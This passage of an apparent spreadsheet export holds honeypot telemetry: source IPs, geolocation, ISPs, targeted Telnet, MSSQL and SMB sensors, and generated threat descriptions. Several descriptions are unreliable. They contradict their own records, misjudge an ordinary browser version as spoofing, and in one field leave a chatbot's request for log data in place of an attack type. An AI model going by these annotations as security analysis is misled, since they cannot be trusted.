    <s v="An incoming connection from an unknown IP address is attempting to access shared files. The IP 123.231.151.154 may be probing for vulnerabilities or trying to exploit SMB services. This could indicate a potential scanning activity. &amp;&amp; An incoming connection from an unknown IP address (123.231.151.154) is attempting to access the SMB service from a potentially vulnerable system. This could be an attempt to gain unauthorized access or spread malware through the network. The source port 52742 suggests a possible brute force attack or scanning activity."/>
    <s v="SMB Auth &amp;&amp; SMB Scanning &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="606"/>
    <x v="606"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T06:25:10"/>
    <d v="2025-04-28T06:25:10"/>
    <d v="2025-04-28T06:25:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:7eb5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This suggests that there has been an attempted telnet connection, but it was refused or had no activity logged for this service. The lack of any reported data indicates either the attacker did not interact with the service or interactions were too minor to be noted. No further details are available about the potential malicious action. &amp;&amp; No malicious activity detected for Telnet service as log indicates unknown or unavailable data. _x000a_Telnet service accessed but no known interactions were recorded possibly indicating a reconnaissance scan or probing attempt without actual interaction. _x000a_Data is missing or not applicable which could indicate a failed connection or incomplete data transmission."/>
    <m/>
  </r>
  <r>
    <x v="607"/>
    <x v="607"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T06:11:05"/>
    <d v="2024-12-12T21:20:22"/>
    <d v="2025-04-28T06:11:05"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (CGO Complex)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.5898"/>
    <s v="77.2357"/>
    <s v="55824"/>
    <s v="National Knowledge Network"/>
    <s v="National Informatics Centre"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="1993-02-04"/>
    <s v="NIC-SDC-PAT"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a464:8201"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Potential SQL injection attempt detected, possibly targeting Microsoft SQL server database management system. Malicious actor may be attempting to exploit vulnerabilities in the database. This could result in unauthorized access or data manipulation. &amp;&amp; Possible login attempt to Microsoft SQL server as the user's credentials were not provided. This could be an attempt to gain unauthorized access or escalate privileges. The absence of username suggests it may be a brute-force attack."/>
    <m/>
  </r>
  <r>
    <x v="608"/>
    <x v="608"/>
    <s v="NA&amp;&amp;204.10.109.208.host.secureserver.net"/>
    <x v="0"/>
    <d v="2025-04-28T05:11:06"/>
    <d v="2023-12-04T06:54:00"/>
    <d v="2025-04-28T05:11:06"/>
    <n v="245"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;42172&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-0001"/>
    <s v="35.694"/>
    <s v="139.754"/>
    <s v="26496"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="hosting"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d06d:acc"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="609"/>
    <x v="609"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T05:01:14"/>
    <d v="2025-04-28T05:01:14"/>
    <d v="2025-04-28T05:01:14"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:4f90"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET activity detected. No malicious connections attempted over this service. The data indicates a lack of engagement with this particular interface."/>
    <s v="Brute Force"/>
  </r>
  <r>
    <x v="610"/>
    <x v="610"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T04:44:52"/>
    <d v="2025-04-28T04:44:52"/>
    <d v="2025-04-28T04:44:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7360:7804"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET connection was made. _x000a_TELNET is commonly used for remote access, so this could indicate no suspicious activity detected via TELNET. _x000a_However, lack of TELNET activity does not necessarily mean there's no malicious activity. &amp;&amp; No malicious activity detected for TELNET service. No connection or attempt made. Service is inactive or unavailable. &amp;&amp; No recent TELNET activity detected which could indicate a lack of attempts to breach via this service or an indication that an attack was attempted but failed or blocked. _x000a_TELNET is a common protocol used for remote access, its absence in log data may suggest attackers are using more stealthy methods. _x000a_This lack of activity might also indicate the service is not active or visible online."/>
    <s v="Brute Force"/>
  </r>
  <r>
    <x v="611"/>
    <x v="611"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T04:04:04"/>
    <d v="2025-04-28T04:04:04"/>
    <d v="2025-04-28T04:04:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:5fdc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible attempts to connect to TELNET service without any successful activity or authentication. No login attempt detected within the available log data. The logs are incomplete for further analysis of malicious intent. &amp;&amp; There was no activity detected on this service since its last check, indicating it may be idle or disabled. The lack of data suggests that either the service is down or there has been no attempt to access it recently. It's possible that the service is not being utilized at all."/>
    <m/>
  </r>
  <r>
    <x v="612"/>
    <x v="612"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T03:56:16"/>
    <d v="2025-04-28T03:56:16"/>
    <d v="2025-04-28T03:56:16"/>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d1:52ae"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="613"/>
    <x v="613"/>
    <s v="syn-035-150-228-005.res.spectrum.com"/>
    <x v="0"/>
    <d v="2025-04-28T03:38:26"/>
    <d v="2025-04-28T03:37:10"/>
    <d v="2025-04-28T03:38:26"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="GA"/>
    <s v="Georgia"/>
    <s v="Gwinnett"/>
    <s v="Sugar Hill"/>
    <s v="4225039"/>
    <s v="NA"/>
    <s v="34.1199"/>
    <s v="-84.0379"/>
    <s v="20115"/>
    <s v="Charter Communications"/>
    <s v="Charter Communications"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="2017-06-30"/>
    <s v="CC04"/>
    <s v="2017-06-30"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:2396:e405"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="High"/>
    <s v="Possible malicious activity is a fake login attempt from a browser with suspiciously high version numbers for Chrome and Safari. The IP address of the device making this request appears to be Windows 10 64-bit. This may be a phishing or brute-force attack. &amp;&amp; A user with a Google Chrome browser is attempting to access the login page for an HTTP service on a Windows 10 system. This could be a legitimate user trying to log in, but it may also indicate a malicious actor trying to brute-force or phish credentials. The version of Chrome (135.0.0.0) seems unusually high and may suggest spoofing or false information being provided."/>
    <m/>
  </r>
  <r>
    <x v="614"/>
    <x v="614"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T03:14:37"/>
    <d v="2024-12-13T06:22:08"/>
    <d v="2025-04-28T03:14:37"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H35"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2008-11-04"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a0:fb2b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The presence of this log entry indicates that an attacker is probing or attempting to exploit a vulnerability related to Microsoft SQL Server, as the data field for MSSQL is listed as 'Not Available' which suggests it has not been properly configured or exposed. This could be part of a larger reconnaissance effort by an attacker."/>
    <m/>
  </r>
  <r>
    <x v="615"/>
    <x v="615"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T02:39:40"/>
    <d v="2024-12-08T18:34:28"/>
    <d v="2025-04-28T02:39:40"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:df53"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="616"/>
    <x v="616"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T02:30:03"/>
    <d v="2025-04-28T00:34:03"/>
    <d v="2025-04-28T02:30:03"/>
    <n v="66"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.033"/>
    <s v="121.565"/>
    <s v="1659"/>
    <s v="Taiwan Academic Network (TANet) Information Center"/>
    <s v="Taiwan Academic Network (TANet) Information Center"/>
    <s v="business"/>
    <s v="Tanet B"/>
    <s v="1992-07-06"/>
    <s v="TANET-B"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a30d:2ecd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="617"/>
    <x v="617"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T02:15:26"/>
    <d v="2023-08-03T10:58:00"/>
    <d v="2025-04-28T02:15:26"/>
    <n v="654"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21177&amp;&amp;1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.18104"/>
    <s v="106.826"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. TELKOM INDONESIA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,56410)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,57393)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,57394)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,57706)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,50250)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,50252)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,50631)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,55088)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,55157)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,49239)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,49278)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,49262)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,49313)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,49699)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,61083)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,61119)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,52994)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,53052)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,63661)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,63735)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,64205)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,62644)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,62654)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,63209)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,57370)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,63945)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,64023)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,60764)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,60825)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,52942)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,53060)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,59426)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,59512)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,50082)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,56284)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,56329)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4fa:c48d"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This indicates potential unauthorized access attempts to various services, suggesting malicious actors may be probing for vulnerabilities. The log data suggests several connections were made but the nature of these activities is unknown due to lack of information. There is insufficient data to determine specific malicious behavior. &amp;&amp; No log data provided to analyze."/>
    <s v="I need log data to analyze! Please provide it so I can assist you with identifying the types of attacks."/>
  </r>
  <r>
    <x v="618"/>
    <x v="618"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T02:15:15"/>
    <d v="2023-07-25T09:12:17"/>
    <d v="2025-04-28T02:15:15"/>
    <n v="972"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
